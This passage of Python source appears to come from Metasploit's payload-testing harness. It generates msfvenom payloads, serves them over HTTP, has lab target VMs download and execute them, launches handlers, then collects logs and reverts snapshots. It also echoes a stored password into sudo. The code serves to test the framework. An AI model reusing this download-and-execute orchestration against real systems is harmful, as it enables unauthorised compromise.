    (4) WRITE THE RC SCRIPT TO DISK LOCALLY
    (5) ADD COMMANDS TO THE STAGE ONE SCRIPT TO LAUNCH MSFCONSOLE WITH RC SCRIPTS TO SET UP FOR REVERSE PAYLOAD CALLBACKS
    (6) ADD COMMAND TO STAGE ONE SCRIPT TO START HTTP SERVER LOCALLY TO HOST THE PAYLOADS FOR DOWNLOAD
    PREP STAGE TWO SCRIPT:
    (1) DETERMINE OS OF TARGET TO DETERMINE WHAT KIND OF SCRIPT WE NEED
    (2) ADD COMANDS TO THE STAGE TWO SCRIPT SO THE TAGETS DOWNLOAD THE PAYLOAD AND EXECUTE IT

    Returns the number of sessions assigned (sessionCounter); sessions are
    round-robined across testConfig['MSF_HOSTS'] and each host dict is
    mutated in place with its STAGE_ONE/STAGE_THREE script text and paths.
    """
    """
    THE FIRST FEW LINES OF THE STAGE ONE SCRIPT PREP THINGS
    """
    """
    CREATE STAGE SCRIPTS
    STAGE_ONE_SCRIPT:
    RUNS ON MSF_HOSTS AND CONTAIN THE MSFVENOM COMMANDS TO
    CREATE THE PAYLOADS THAT NEED TO BE UPLOADED TO THE TARGETS,
    START AN HTTP SERVER ON THE MSF_HOSTS TO SERVE THE PAYLOADS,
    AND LAUNCH THE SPECIFIED EXPLOITS
    STAGE_TWO_SCRIPTS:
    RUN ON TARGET SYSTEMS AND CONTAIN THE COMMANDS TO DOWNLOAD
    THE PAYLOADS FROM THE MSF_HOSTS AND LAUNCH THEM ON THE TARGETS
    STAGE_THREE_SCRIPT:
    RUN ON THE MSF_HOSTS TO ESTABLISH CONNECTIONS TO THE BIND PAYLOADS
    """
    lineComment = '\n#################################################################\n'
    # Seed each host's script with a banner; MSF hosts get stage one/three,
    # targets get stage two.
    for host in testConfig['MSF_HOSTS']:
        host['STAGE_ONE_SCRIPT'] = lineComment + "\n # STAGE ONE SCRIPT FOR " + host['NAME'] + lineComment
        host['STAGE_THREE_SCRIPT'] = lineComment + "\n # STAGE THREE SCRIPT FOR " + host['NAME'] + lineComment
    for host in testConfig['TARGETS']:
        host['STAGE_TWO_SCRIPT'] = lineComment + "\n # STAGE TWO SCRIPT FOR " + host['NAME'] + lineComment
    fileId=0;
    # Per-MSF-host setup: derive artifact paths and build the stage-one
    # preamble (framework update, rvm/bundler setup, payload dirs, tcpdump).
    for host in testConfig['MSF_HOSTS']:
        host['LISTEN_PORTS'] = []
        fileId = fileId + 1
        # STAGE ONE SCRIPT STUFF
        host['STAGE_ONE_FILENAME'] = testConfig['SCRIPT_DIR'] + '/' + "stageOneScript_" + str(fileId) + ".sh"
        host['MSF_PAYLOAD_PATH'] = host['MSF_ARTIFACT_PATH'] + "/test_payloads"
        host['RC_PATH'] = host['MSF_ARTIFACT_PATH'] + "/test_rc"
        host['COMMIT_FILE'] = host['MSF_ARTIFACT_PATH'] + "/commit_tag_" + testConfig['TIMESTAMP']
        host ['SCRIPT_PATH'] = host['MSF_ARTIFACT_PATH'] + "/test_scripts"
        host['STAGE_THREE_LOGFILE'] = host['SCRIPT_PATH'] + "/stageThreeLog.txt"
        host['PCAP_FILE'] = host['MSF_ARTIFACT_PATH'] + "/logfile.pcap"
        stageOneContent = "#!/bin/bash -l \n\n"
        stageOneContent = stageOneContent + "cd " + host['MSF_PATH'] + "\n"
        stageOneContent = stageOneContent + "git fetch upstream\n"
        stageOneContent = stageOneContent + "git reset --hard FETCH_HEAD\n"
        stageOneContent = stageOneContent + "git clean -df\n"
        stageOneContent = stageOneContent + generateBranchScript(testConfig['FRAMEWORK_BRANCH'], testConfig['LOG_FILE'])
        stageOneContent = stageOneContent + "git log | head -n 1 > " + host['COMMIT_FILE'] + "\n"
        stageOneContent = stageOneContent + "source ~/.rvm/scripts/rvm\n"
        stageOneContent = stageOneContent + "cd " + host['MSF_PATH'] + "\n"
        stageOneContent = stageOneContent + "rvm --install $(cat .ruby-version)\n"
        stageOneContent = stageOneContent + "gem install bundler\n"
        stageOneContent = stageOneContent + "bundle install\n"
        stageOneContent = stageOneContent + "mkdir " + host['MSF_PAYLOAD_PATH'] + "\n"
        stageOneContent = stageOneContent + "rm -rf " + host['MSF_PAYLOAD_PATH'] + "/*\n"
        stageOneContent = stageOneContent + "mkdir " + host['RC_PATH'] + "\n"
        stageOneContent = stageOneContent + "rm -rf " + host['RC_PATH'] + "/*\n"
        # Start a packet capture for the whole test run (stopped by pullMsfLogs).
        stageOneContent = stageOneContent + "echo '" +host['PASSWORD']+ "' | sudo -S tcpdump -i any -s0 -nn net 192.168.0.0/16 -w " + host['PCAP_FILE'] + " &\n"
        host['STAGE_ONE_SCRIPT'] = stageOneContent
        host['STAGE_THREE_SCRIPT'] = "#!/bin/bash -l\n\n"
        host['STAGE_THREE_SCRIPT'] = host['STAGE_THREE_SCRIPT'] + "cd " + host['MSF_PATH'] + "\n"
        host['STAGE_THREE_SCRIPT'] = host['STAGE_THREE_SCRIPT'] + "source ~/.rvm/scripts/rvm\n"
        host['STAGE_THREE_SCRIPT'] = host['STAGE_THREE_SCRIPT'] + "cd " + host['MSF_PATH'] + "\n"
        host['STAGE_THREE_SCRIPT'] = host['STAGE_THREE_SCRIPT'] + "rvm --install $(cat .ruby-version)\n"
        host['STAGE_THREE_SCRIPT'] = host['STAGE_THREE_SCRIPT'] + "gem install bundler\n"
        host['STAGE_THREE_SCRIPT'] = host['STAGE_THREE_SCRIPT'] + "bundle install\n"
    sessionCounter = 0
    # Per-target: assign each session to an MSF host (round-robin) and append
    # its msfvenom + rc-script commands to that host's stage-one script.
    for host in testConfig['TARGETS']:
        host['LISTEN_PORTS'] = []
        logMsg(testConfig['LOG_FILE'], "=============================================================================")
        logMsg(testConfig['LOG_FILE'], host['NAME'])
        logMsg(testConfig['LOG_FILE'], "=============================================================================")
        for sessionData in host['SESSION_DATASETS']:
            sessionData['MSF_HOST'] = testConfig['MSF_HOSTS'][sessionCounter % len(testConfig['MSF_HOSTS'])]
            sessionCounter = sessionCounter + 1
            logMsg(testConfig['LOG_FILE'], "ASSIGNING TO MSF_HOST " + sessionData['MSF_HOST']['NAME'])
            stageOneContent = '\n\n##########################\n'
            stageOneContent = stageOneContent + '# MODULE: ' + sessionData['MODULE']['NAME'] + '\n'
            if 'PAYLOAD' in sessionData:
                stageOneContent = stageOneContent + '# PAYLOAD: ' + sessionData['PAYLOAD']['NAME'] + '\n'
                sessionData['PAYLOAD']['PRIMARY_PORT'] = portNum.get()
                uniqueId = str(sessionData['PAYLOAD']['PRIMARY_PORT'])
                # Reverse handlers need their listen port tracked on the MSF host.
                if 'reverse' in sessionData['PAYLOAD']['NAME'].lower() \
                        and sessionData['MODULE']['NAME'].lower() == 'exploit/multi/handler':
                    sessionData['MSF_HOST']['LISTEN_PORTS'].append(str(sessionData['PAYLOAD']['PRIMARY_PORT']))
            else:
                uniqueId = getTimestamp()
            stageOneContent = stageOneContent + '# TARGET: ' + host['IP_ADDRESS'] + '\n'
            stageOneContent = stageOneContent + '# MSF_HOST: ' + sessionData['MSF_HOST']['IP_ADDRESS'] + '\n'
            stageOneContent = stageOneContent + '#\n'
            if sessionData['MODULE']['NAME'].lower() == 'exploit/multi/handler':
                # WE NEED TO ADD THE MSFVENOM COMMAND TO MAKE THE PAYLOAD TO THE STAGE ONE SCRIPT
                sessionData['PAYLOAD']['FILENAME'] = '-'.join(sessionData['PAYLOAD']['NAME'].split('/')) + \
                                                    '-' + 'x'.join(host['IP_ADDRESS'].split('.')) + \
                                                    '-' + uniqueId
                sessionData['PAYLOAD']['VENOM_CMD'] = makeVenomCmd(host,
                                                                   sessionData,
                                                                   portNum,
                                                                   testConfig['LOG_FILE'])
                # ADD VENOM COMMAND TO THE SCRIPT CONTENT
                stageOneContent = stageOneContent + sessionData['PAYLOAD']['VENOM_CMD'] + '\n'
                stageOneContent = stageOneContent + 'mv ' + sessionData['PAYLOAD']['FILENAME'] + \
                                  ' ' + sessionData['MSF_HOST']['MSF_PAYLOAD_PATH'] + '/' + sessionData['PAYLOAD']['FILENAME'] + '\n'
                stageOneContent = stageOneContent + "sleep 20\n"
                sessionData['RC_IN_SCRIPT_NAME'] = sessionData['MSF_HOST']['RC_PATH'] + '/' + sessionData['PAYLOAD']['FILENAME'].split('.')[0]+'.rc'
            else:
                sessionData['RC_IN_SCRIPT_NAME'] = sessionData['MSF_HOST']['RC_PATH'] + '/' + '-'.join(sessionData['MODULE']['NAME'].split('/')) + '_' + \
                                                   host['IP_ADDRESS'] + '_' + uniqueId + '.rc'
            sessionData['RC_OUT_SCRIPT_NAME'] = sessionData['RC_IN_SCRIPT_NAME'] + '.txt'
            rcScriptContent = makeRcScript(testConfig['COMMAND_LIST'],
                                           host,
                                           sessionData,
                                           testConfig['LOG_FILE'],
                                           portNum)
            stageOneContent = stageOneContent + rcScriptContent + '\n'
            # Bind payloads are launched later (stage three) so the payload is
            # already running on the target; everything else launches in stage one.
            if 'PAYLOAD' in sessionData \
                    and 'bind' in sessionData['PAYLOAD']['NAME'].lower() \
                    and sessionData['MODULE']['NAME'].lower() == 'exploit/multi/handler':
                launchBind = './msfconsole -qr '+ sessionData['RC_IN_SCRIPT_NAME'] + ' > ' + sessionData['RC_OUT_SCRIPT_NAME'] + '&\n'
                logLaunch = "echo 'LAUNCHING " + sessionData['RC_IN_SCRIPT_NAME'] + "' >> " + sessionData['MSF_HOST']['STAGE_THREE_LOGFILE'] + '\n'
                sessionData['MSF_HOST']['STAGE_THREE_SCRIPT'] = sessionData['MSF_HOST']['STAGE_THREE_SCRIPT'] + launchBind
                sessionData['MSF_HOST']['STAGE_THREE_SCRIPT'] = sessionData['MSF_HOST']['STAGE_THREE_SCRIPT'] + logLaunch
                logLaunch = "echo 'SUCCESSFULLY LAUNCHED " + sessionData['RC_IN_SCRIPT_NAME'] + "' >> " + sessionData['MSF_HOST']['STAGE_THREE_LOGFILE'] + '\n'
                sessionData['MSF_HOST']['STAGE_THREE_SCRIPT'] = sessionData['MSF_HOST']['STAGE_THREE_SCRIPT'] + logLaunch
                sessionData['MSF_HOST']['STAGE_THREE_SCRIPT'] = sessionData['MSF_HOST']['STAGE_THREE_SCRIPT'] + "sleep 10\n"
            else:
                stageOneContent = stageOneContent + './msfconsole -qr '+ \
                                  sessionData['RC_IN_SCRIPT_NAME'] + ' > ' + sessionData['RC_OUT_SCRIPT_NAME'] + ' &\n'
            sessionData['MSF_HOST']['STAGE_ONE_SCRIPT'] = sessionData['MSF_HOST']['STAGE_ONE_SCRIPT'] + stageOneContent
    return sessionCounter
def prepTestVms(testConfig):
    """
    Prepare every MSF host and target for a test run.

    For virtual hosts: record and take a temporary snapshot named
    PAYLOAD_TESTING_<timestamp>, optionally revert to a configured
    TESTING_SNAPSHOT, then power each VM on.  Physical hosts are assumed
    to already be ready.

    Returns the list of VM objects belonging to virtual hosts.
    """
    testVms = []
    allHosts = testConfig['TARGETS'] + testConfig['MSF_HOSTS']
    # Pass 1: snapshot bookkeeping while the VMs are still untouched.
    for host in allHosts:
        if host['TYPE'] != "VIRTUAL":
            continue
        host['TEMP_SNAPSHOT'] = 'PAYLOAD_TESTING_'+testConfig['TIMESTAMP']
        if not host['VM_OBJECT'].takeSnapshot(host['TEMP_SNAPSHOT']):
            logMsg(testConfig['LOG_FILE'], "FAILED TO CREATE SNAPSHOT ON " + host['NAME'])
        if 'TESTING_SNAPSHOT' in host:
            logMsg(testConfig['LOG_FILE'], "TRYING TO REVERT " + host['NAME'] + " TO " + host['TESTING_SNAPSHOT'])
            host['VM_OBJECT'].revertToSnapshotByName(host['TESTING_SNAPSHOT'])
    # Pass 2: power on each virtual host, pausing briefly between boots.
    for host in allHosts:
        if host['TYPE'] == 'VIRTUAL':
            vmObject = host['VM_OBJECT']
            testVms.append(vmObject)
            vmObject.getSnapshots()
            vmObject.powerOn(False)
            time.sleep(2)
    return testVms
def pullMsfLogs(testConfig):
    """
    Collect post-run artifacts from every MSF host: stop tcpdump, download
    the pcap capture and the framework commit-tag file, and record the
    framework commit hash in msfHost['COMMIT_VERSION'] for the report.

    Failures are logged; a host whose commit hash cannot be parsed gets
    COMMIT_VERSION = "UNKNOWN".  Always returns None.
    """
    logFile = None  # commit-file read errors occur before the log path matters
    for msfHost in testConfig['MSF_HOSTS']:
        # Stop the packet capture started by the stage-one script.
        msfHost['VM_OBJECT'].runCmdOnGuest(['/usr/bin/killall', 'tcpdump'])
        srcFile = msfHost['PCAP_FILE']
        dstFile = testConfig['REPORT_DIR'] + "/" + msfHost['NAME'] + ".pcap"
        msfHost['LOCAL_PCAP'] = dstFile
        msfHost['VM_OBJECT'].getFileFromGuest(srcFile, dstFile)
        srcFile = msfHost['COMMIT_FILE']
        dstFile = testConfig['REPORT_DIR'] + "/commit_" + '-'.join(msfHost['IP_ADDRESS'].split('.')) + ".txt"
        msfHost['VM_OBJECT'].getFileFromGuest(srcFile, dstFile)
        try:
            # 'with' replaces the manual open/close so the handle cannot
            # leak if read() raises.
            with open(dstFile, 'r') as fileObj:
                commitRaw = fileObj.read().strip()
        except IOError as e:
            logMsg(logFile, "FAILED TO OPEN " + dstFile)
            logMsg(logFile, "SYSTEM ERROR: \n" + str(e))
        else:
            try:
                # Expected file content: "commit <hash>" (from 'git log | head -n 1').
                msfHost['COMMIT_VERSION'] = commitRaw.split(' ')[1]
                logMsg(testConfig['LOG_FILE'], "COMMIT VERSION OF metasploit-framework on " + msfHost['NAME'] + ": " + msfHost['COMMIT_VERSION'])
            except IndexError:
                # Narrowed from a bare 'except': split()[1] can only raise IndexError here.
                logMsg(testConfig['LOG_FILE'], "FAILED TO RETRIEVE COMMIT VERSION")
                msfHost['COMMIT_VERSION'] = "UNKNOWN"
    return None
def pullTargetLogs(testConfig):
    """
    Download each session's msfconsole output file (.rc.txt) and the rc
    script that produced it (.rc) from the responsible MSF host into the
    local SESSION_DIR, recording the local output path in
    sessionData['LOCAL_SESSION_FILE'].  Failures are logged and skipped.
    Always returns None.
    """
    logPath = testConfig['LOG_FILE']
    sessionDir = testConfig['SESSION_DIR']
    for target in testConfig['TARGETS']:
        for sessionData in target['SESSION_DATASETS']:
            # First: the console output produced by the rc script.
            remotePath = sessionData['RC_OUT_SCRIPT_NAME']
            logMsg(logPath, "RC_OUT_SCRIPT_NAME = " + str(sessionData['RC_OUT_SCRIPT_NAME']))
            logMsg(logPath, "SESSION_DIR = " + testConfig['SESSION_DIR'])
            logMsg(logPath, "RC_OUT_SCRIPT_NAME = " + str(sessionData['RC_OUT_SCRIPT_NAME'].split('/')[-1]))
            localPath = sessionDir + '/' + str(sessionData['RC_OUT_SCRIPT_NAME'].split('/')[-1])
            sessionData['LOCAL_SESSION_FILE'] = localPath
            logMsg(logPath, "SAVING " + target['NAME'] + ":" + remotePath + " AS " + localPath)
            if not sessionData['MSF_HOST']['VM_OBJECT'].getFileFromGuest(remotePath, localPath):
                logMsg(logPath, "FAILED TO SAVE " + target['NAME'] + ":" + remotePath + " AS " + localPath)
            # Second: the rc script itself, for the report.
            remotePath = sessionData['RC_IN_SCRIPT_NAME']
            localPath = sessionDir + '/' + str(sessionData['RC_IN_SCRIPT_NAME'].split('/')[-1])
            if not sessionData['MSF_HOST']['VM_OBJECT'].getFileFromGuest(remotePath, localPath):
                logMsg(logPath, "FAILED TO SAVE " + target['NAME'] + ":" + remotePath + " AS " + localPath)
    return None
def replacePortKeywords(testConfig, portNum):
    """
    Substitute the placeholder string 'UNIQUE_PORT' in every target
    payload setting with a fresh port drawn from portNum.get(),
    rewriting each setting in place (first occurrence only).

    Module settings are logged but NOT rewritten -- this preserves the
    original behavior; replaceWildcards() performs module-side
    substitution later.  All values are traced to the test log.
    """
    for target in testConfig['TARGETS']:
        logMsg(testConfig['LOG_FILE'], "MODULES = " + str(target['MODULES']))
        if 'PAYLOADS' in target:
            logMsg(testConfig['LOG_FILE'], "PAYLOADS = " + str(target['PAYLOADS']))
            for payload in target['PAYLOADS']:
                logMsg(testConfig['LOG_FILE'], str(payload))
                # REPLACE THE STRING 'UNIQUE_PORT' WITH AN ACTUAL UNIQUE PORT
                # (enumerate replaces the index-based loop; dead commented-out
                # debug code from the original removed)
                for index, settingItem in enumerate(payload['SETTINGS']):
                    logMsg(testConfig['LOG_FILE'], "SETTING ITEM= " + settingItem + str(id(settingItem)))
                    if 'UNIQUE_PORT' in settingItem:
                        payload['SETTINGS'][index] = settingItem.replace("UNIQUE_PORT", str(portNum.get()), 1)
                        logMsg(testConfig['LOG_FILE'], "SETTING ITEM= " + payload['SETTINGS'][index] + str(id(payload['SETTINGS'][index])))
        for module in target['MODULES']:
            logMsg(testConfig['LOG_FILE'], str(module))
            for settingItem in module['SETTINGS']:
                logMsg(testConfig['LOG_FILE'], "SETTING ITEM= " + settingItem + str(id(settingItem)))
def replaceWildcards(originalString, targetData, sessionData, portNum):
    """
    Expand the first occurrence of each supported placeholder in a command
    string: UNIQUE_PORT, MSF_IP, TARGET_IP, TARGET_USERNAME and
    TARGET_PASSWORD.  portNum.get() is consumed only when UNIQUE_PORT is
    actually present, so port numbers are never wasted.  Returns the
    expanded string.
    """
    result = originalString
    if 'UNIQUE_PORT' in result:
        result = result.replace("UNIQUE_PORT", str(portNum.get()), 1)
    # Lambdas keep the dict lookups lazy: a value is only fetched when its
    # placeholder is present, matching the original conditional accesses.
    substitutions = (
        ("MSF_IP", lambda: sessionData['MSF_HOST']['IP_ADDRESS']),
        ("TARGET_IP", lambda: targetData['IP_ADDRESS']),
        ("TARGET_USERNAME", lambda: targetData['USERNAME']),
        ("TARGET_PASSWORD", lambda: targetData['PASSWORD']),
    )
    for keyword, lookup in substitutions:
        if keyword in result:
            result = result.replace(keyword, lookup(), 1)
    return result
def resetVms(testConfig):
    """
    Restore every virtual MSF host and target to its pre-test state by
    reverting to (then deleting) the TEMP_SNAPSHOT taken at test start,
    powering the VM off in between.

    Returns False when the config is unusable or any virtual host had no
    TEMP_SNAPSHOT recorded; True otherwise.
    """
    if testConfig is None or 'LOG_FILE' not in testConfig:
        return False
    allReverted = True
    for groupName in ['MSF_HOSTS', 'TARGETS']:
        for host in testConfig.get(groupName, []):
            if host['TYPE'] != "VIRTUAL":
                continue
            logMsg(testConfig['LOG_FILE'], "RESETTING VM " + host['NAME'])
            if 'TEMP_SNAPSHOT' not in host:
                logMsg(testConfig['LOG_FILE'], "NO TEMP SNAPSHOT FOUND FOR " + host['NAME'])
                allReverted = False
                continue
            logMsg(testConfig['LOG_FILE'], "RESETTING VM " + host['NAME'] + " TO " + str(host['TEMP_SNAPSHOT']))
            host['VM_OBJECT'].revertToSnapshotByName(host['TEMP_SNAPSHOT'])
            host['VM_OBJECT'].powerOff()
            host['VM_OBJECT'].deleteSnapshot(host['TEMP_SNAPSHOT'])
    return allReverted
def revertVm(vmObject, snapshot = None):
    """
    Revert a VM either to an explicitly named snapshot or to its temporary
    payload-testing snapshot(s).

    vmObject -- VM wrapper object; returns False immediately when None.
    snapshot -- optional snapshot name; when given, revert to it and
                return the wrapper's result.
    When no name is given, scan the snapshot list (newest first) for
    snapshots created by prepTestVms() (prefix 'PAYLOAD_TESTING_'),
    revert to each, delete it, and power the VM off.  Returns True.
    """
    if vmObject is None:
        return False
    vmObject.getSnapshots()
    if snapshot is not None:
        """
        JUST RETURN TO THE TESTING SNAPSHOT
        """
        return vmObject.revertToSnapshotByName(snapshot)
    else:
        """
        JUST RESET TO THE TEMP SNAPSHOT
        """
        # Newest first so the most recent temp snapshot is handled first.
        vmObject.snapshotList.sort(reverse=True)
        for i in vmObject.snapshotList:
            # BUG FIX: prepTestVms() names temp snapshots 'PAYLOAD_TESTING_<ts>'
            # (underscore); the original matched 'PAYLOAD_TESTING-' (hyphen)
            # and therefore never found them, leaving stale snapshots behind.
            if "PAYLOAD_TESTING_" in i[0].name:
                vmObject.server.logMsg("REVERTING " + vmObject.vmName + " TO " + i[0].name)
                vmObject.revertToSnapshot(i[0].snapshot)
                vmObject.deleteSnapshot(i[0].name)
                vmObject.powerOff()
        return True
def runTest(testConfig, portNum):
    """
    FIGURE OUT HOW MANY PAYLOADS WE HAVE AND HOW MANY MSF_HOSTS WE HAVE
    SO WE CAN SPLIT THE WORK AMONG ALL MSF_HOSTS
    """
    # Top-level driver for one full test run: boots the VMs, runs the three
    # staged scripts, waits for sessions, gathers logs, and writes the HTML
    # report.  Returns the checkData() result, or False on any setup failure.
    msfHostCount = len(testConfig['MSF_HOSTS'])
    sessionCount = getSessionCount(testConfig)
    logMsg(testConfig['LOG_FILE'], "MSF_HOST COUNT = " + str(msfHostCount))
    logMsg(testConfig['LOG_FILE'], "SESSION COUNT = " + str(sessionCount))
    testVms = instantiateVmsAndServers(testConfig)
    # IF WE COULD NOT FIND A VM, ABORT
    if None in testVms:
        return False
    # TAKE SNAPSHOT AND/OR SET THE VMS TO THE DESIRED SNAPSHOT AND POWERS ON
    prepTestVms(testConfig)
    # WAIT UNTIL ALL VMS HAVE A WORKING TOOLS SERVICE AND AN IP ADDRESS
    if not waitForVms(testVms):
        return False
    """
    MAKE SURE THE TEST CONFIG HAS ANY DHCP ADDRESSES SET PROPERLY AND VERIFY ALL TARGETS?MSF_HOSTS HAVE AN IP
    """
    if not setVmIPs(testConfig):
        return False
    """
    CREATE REQUIRED DIRECTORY FOR PAYLOADS ON VM_TOOLS MANAGED MACHINES
    CAN'T DO THIS EARLIER, AS THE MACHINES WERE OFF AND WE NEEDED DHCP-GENERATED IP ADDRESSES
    """
    for host in testConfig['TARGETS']:
        if "VM_TOOLS_UPLOAD" in host['METHOD'].upper():
            host['VM_OBJECT'].makeDirOnGuest(host['PAYLOAD_DIRECTORY'])
    sessionCounter = prepStagedScripts(testConfig, portNum)
    # Seconds allowed for msfvenom payload generation before giving up.
    timeoutSeconds = 200
    if not finishAndLaunchStageOne(testConfig['MSF_HOSTS'], testConfig['HTTP_PORT'], testConfig['LOG_FILE']):
        logMsg(testConfig['LOG_FILE'], "FAILED finishAndLaunchStageOne")
        return False
    if not waitForHttpServer(testConfig['MSF_HOSTS'], testConfig['LOG_FILE'], testConfig['HTTP_PORT']):
        logMsg(testConfig['LOG_FILE'], "FAILED waitForHttpServer")
        return False
    if not waitForMsfPayloads(testConfig['MSF_HOSTS'], testConfig['REPORT_DIR'], testConfig['LOG_FILE'], timeoutSeconds):
        logMsg(testConfig['LOG_FILE'], "FAILED waitForMsfPayloads")
        return False
    """
    STAGE TWO STUFF
    """
    # Sentinel written at the end of each stage-two script so completion
    # can be detected by polling the remote log.
    terminationToken = "!!! STAGE TWO COMPLETE !!!"
    stageTwoResults = launchStageTwo(testConfig, terminationToken, 180)
    if not stageTwoResults[0]:
        logMsg(testConfig['LOG_FILE'], "FAILED launchStageTwo")
        return False
    else:
        # NOTE(review): both flags read stageTwoResults[1] -- if stage two and
        # stage three are meant to be independent, one index looks wrong; confirm.
        stageTwoNeeded = stageTwoResults[1]
        stageThreeNeeded = stageTwoResults[1]
    """
    IF WE LAUNCHED STAGE TWO, WAIT FOR THE SCRIPTS TO COMPLETE
    """
    if stageTwoNeeded:
        if not finishStageTwo(testConfig, terminationToken):
            logMsg(testConfig['LOG_FILE'], "FAILED finishStageTwo")
            return False
    else:
        logMsg(testConfig['LOG_FILE'], "NO STAGE TWO REQUIRED")
    """
    MAKE STAGE THREE SCRIPT TO RUN BIND HANDLERS ON MSF HOSTS
    """
    if stageThreeNeeded:
        if not launchStageThree(testConfig):
            logMsg(testConfig['LOG_FILE'], "FAILED launchStageThree")
            return False
        else:
            logMsg(testConfig['LOG_FILE'], "WAITING FOR MSFCONSOLES TO LAUNCH...")
            time.sleep(20)
    else:
        logMsg(testConfig['LOG_FILE'], "NO STAGE THREE SCRIPTS NEEDED")
    """
    WAIT FOR THE METERPRETER SESSIONS TO FINISH....
    """
    waitForMeterpreters(testConfig, sessionCounter)
    """
    PULL STAGE THREE LOG FILES FROM MSF VMS
    """
    if stageThreeNeeded:
        for msfHost in testConfig['MSF_HOSTS']:
            remoteFileName = msfHost['STAGE_THREE_LOGFILE']
            localFileName = testConfig['REPORT_DIR'] + '/' + msfHost['NAME'] + "_stageThreeLog.txt"
            msfHost['VM_OBJECT'].getFileFromGuest(remoteFileName, localFileName)
    else:
        logMsg(testConfig['LOG_FILE'], "NO STAGE THREE LOGFILES")
    """
    PULL REPORT FILES FROM EACH TEST VM
    """
    pullTargetLogs(testConfig)
    logMsg(testConfig['LOG_FILE'], "FINISHED DOWNLOADING REPORTS")
    """
    GET COMMIT VERSION, PCAPS, AND OTHER LOGS FROM MSF HOSTS
    """
    pullMsfLogs(testConfig)
    """
    CHECK TEST RESULTS
    """
    testResult = checkData(testConfig)
    """
    GENERATE HTML REPORT
    """
    htmlReportString = makeHtmlReport(testConfig['TARGETS'], testConfig['MSF_HOSTS'])
    htmlFileName = testConfig['REPORT_DIR'] + "/" + testConfig['REPORT_PREFIX'] + ".html"
    try:
        fileObj = open(htmlFileName, 'w')
        fileObj.write(htmlReportString)
        fileObj.close()
    except IOError as e:
        logMsg(testConfig['LOG_FILE'], "FAILED TO OPEN " + htmlFileName)
        logMsg(testConfig['LOG_FILE'], "SYSTEM ERROR: \n" + str(e))
    return testResult
def selectVms(vmList, posFilter=None):
    """
    Interactively choose VMs from vmList.

    posFilter -- optional case-insensitive substring; only VMs whose
                 vmIdentifier contains it are offered.
    Prints an indexed menu, reads a comma-separated list of indices from
    stdin, and returns the corresponding VM objects.
    Raises ValueError/IndexError on malformed input, as before.
    """
    # BUG FIX: raw_input() exists only on Python 2 and raised NameError under
    # Python 3; prefer it when available, otherwise fall back to input(),
    # which has the same read-a-line semantics on Python 3.
    try:
        readLine = raw_input
    except NameError:
        readLine = input
    menuVms = []
    selectedVmList = []
    for vm in vmList:
        if (posFilter is None) or (posFilter.upper() in vm.vmIdentifier.upper()):
            menuVms.append(vm)
    for index, vm in enumerate(menuVms):
        print(str(index) + " " + vm.vmIdentifier)
    feedBack = readLine(">> ")
    print("SELECTION: " + feedBack +'\n')
    for choice in feedBack.split(','):
        selectedVmList.append(menuVms[int(choice)])
    return selectedVmList
def setupSessionData(testConfig):
    """
    Expand each target's MODULES (and, for exploit modules, its PAYLOADS)
    into per-session work items appended to target['SESSION_DATASETS'].

    Returns False (after logging) as soon as any target lists no modules;
    True otherwise.
    """
    for target in testConfig['TARGETS']:
        logMsg(testConfig['LOG_FILE'], str(target))
        if 'MODULES' not in target:
            logMsg(testConfig['LOG_FILE'], "CONFIG FILE DID NOT HAVE MODULES LISTED FOR " + target['NAME'] + ". NOTHING TO TEST?")
            return False
        for module in target['MODULES']:
            logMsg(testConfig['LOG_FILE'], str(module))
            if 'exploit' not in module['NAME'].lower():
                # Non-exploit modules run standalone -- no payload pairing.
                target['SESSION_DATASETS'].append({'MODULE': module.copy()})
                continue
            # Exploit modules get one session dataset per configured payload.
            for payload in target['PAYLOADS']:
                logMsg(testConfig['LOG_FILE'], str(payload))
                target['SESSION_DATASETS'].append({'MODULE': module.copy(),
                                                   'PAYLOAD': payload.copy()})
    return True
def setVmIPs(testConfig):
    """
    Fill in IP_ADDRESS for virtual hosts that have a VM object but no
    address yet (DHCP lookup), then verify every MSF host and target has
    an address.  Returns False as soon as any host lacks one.
    """
    for host in testConfig['MSF_HOSTS'] + testConfig['TARGETS']:
        needsLookup = (host['TYPE'].upper() == 'VIRTUAL'
                       and 'IP_ADDRESS' not in host
                       and 'VM_OBJECT' in host)
        if needsLookup:
            host['IP_ADDRESS'] = host['VM_OBJECT'].getVmIp()
        if 'IP_ADDRESS' not in host:
            return False
    return True
def verifyConfig(jsonDic):
    """
    Validate the parsed test-configuration dictionary.

    Checks required top-level keys, per-MSF-host keys, and per-target keys
    (which depend on the target's METHOD/TYPE and on whether any java or
    python payloads are configured), printing a message for each missing
    item.  Returns True when the configuration is complete, False otherwise.
    """
    # CHECK MAIN LEVEL FOR REQUIRED DATA
    configPassed = True
    requiredList = ["FRAMEWORK_BRANCH",
                    "HTTP_PORT",
                    "STARTING_LISTENER",
                    "MSF_HOSTS",
                    "TARGETS",
                    "SUCCESS_LIST"]
    for item in requiredList:
        if item not in jsonDic:
            print("MISSING " + item + " IN CONFIGURATION FILE\n")
            configPassed = False
    if not configPassed:
        return False
    # MSF_HOSTS
    requiredMsfData = ["MSF_ARTIFACT_PATH", "TYPE", "METHOD", "NAME"]
    for requiredData in requiredMsfData:
        for msfHost in jsonDic['MSF_HOSTS']:
            if requiredData not in msfHost:
                print("NO " + requiredData + " LISTED FOR MSF_HOST IN CONFIG FILE")
                configPassed = False
    if not configPassed:
        return False
    # SPECIFIC FOR TARGETS
    # BUG FIX: the original never initialized these flags, raising NameError
    # whenever no java/python payload was listed, and it stopped scanning at
    # the first match (break), so a python payload after a java one was
    # missed.  Scan the whole list once, up front.  .get() also guards the
    # previously unconditional jsonDic['PAYLOADS'] access (PAYLOADS is not a
    # required key).
    hasJavaPayload = False
    hasPythonPayload = False
    for payload in jsonDic.get('PAYLOADS', []):
        payloadName = payload['NAME'].lower()
        if 'java' in payloadName:
            hasJavaPayload = True
        if 'python' in payloadName:
            hasPythonPayload = True
    for target in jsonDic['TARGETS']:
        requiredTargetData = ["TYPE", "NAME"]
        # NOTE(review): the original appended "NAME" again for EXPLOIT targets
        # (a harmless duplicate) -- possibly another key was intended; kept as-is.
        if target.get('METHOD') == 'EXPLOIT':
            requiredTargetData.append("NAME")
        if target.get('TYPE') != 'VIRTUAL':
            requiredTargetData.append("IP_ADDRESS")
        if target.get('METHOD') == "VM_TOOLS":
            requiredTargetData.append("USERNAME")
            requiredTargetData.append("PASSWORD")
            requiredTargetData.append("HYPERVISOR_CONFIG")
            requiredTargetData.append("PAYLOAD_DIRECTORY")
        # Java/python payloads need an interpreter path on every target.
        if hasJavaPayload:
